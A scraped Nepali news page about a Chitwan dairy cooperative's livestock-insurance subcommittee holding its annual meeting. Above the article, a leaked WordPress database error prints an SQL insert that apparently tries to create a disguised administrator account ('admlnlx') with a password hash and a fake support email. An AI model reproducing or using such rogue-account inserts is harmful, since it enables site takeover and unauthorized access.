WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bq/TVgWzimADf7VAgKVHOzRcjDAN5n.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 21:40:46', '', 'admlnlx', 'admlnlx')
चितवन, माघ १५–
पूर्वी चितवनको खैरहनी–१५ स्थित नन्दिनी दुग्ध उत्पादक सहकारी संस्था अन्र्तगत रहेको पशुधन सुरक्षण उपसमितिको दोश्रो वार्षिक साधारण सभा शनिबार सम्पन्न भएको छ ।
पशु सेवा केन्द्र खैरहनीका प्रमुख युगेश्वर शाहको प्रमुख आतिथ्यतामा भएको सो कार्यक्रममा उपसमिति संयोजक शुशिल कँडेलले वार्षिक प्रगति प्रतिवेदन र कोषाध्यक्ष गोपाल प्रसाद सापकोटाले लेखा परीक्षण प्रतिवेदन प्रस्तुत गरेका थिए । दुई वर्षको अवधिमा उपसमितिमा ३ सय ७० जनाले पशुको विमा गरेको संयोजक कँडेलले पेश गरेको वार्षिक प्रतिवेदनमा उल्लेख छ । सुरुमा किसानहरुलाई बीमाको बारे बुझाउन नसक्दा किसानले खासै चासो नदिएको उनले बताए ।
यो अवधिमा ५ वटा पशुको मृत्यु भएकोमा त्यसको क्षती बापत १ लाख ४१ हजार रुपैयाँ किसानले प्राप्त गरेको कोषाध्यक्ष सापकोटाले जानकारी दिए । उपसमितिका २ सय ४८ सदस्य छन् । पशुको मृत्यु, बाँझोपन र थुनेलोबाट हुने क्षती न्यूनीकरणका लागी बीमा गर्न संस्थाले किसानलाई प्रेरित गर्दै आएको छ । नन्दिनी दुग्ध उत्पादक सहकारी संस्थाका अध्यक्ष बालकृष्ण उप्रेतीको अध्यक्षतामा साधारण सभा सम्पन्न भएको थियो ।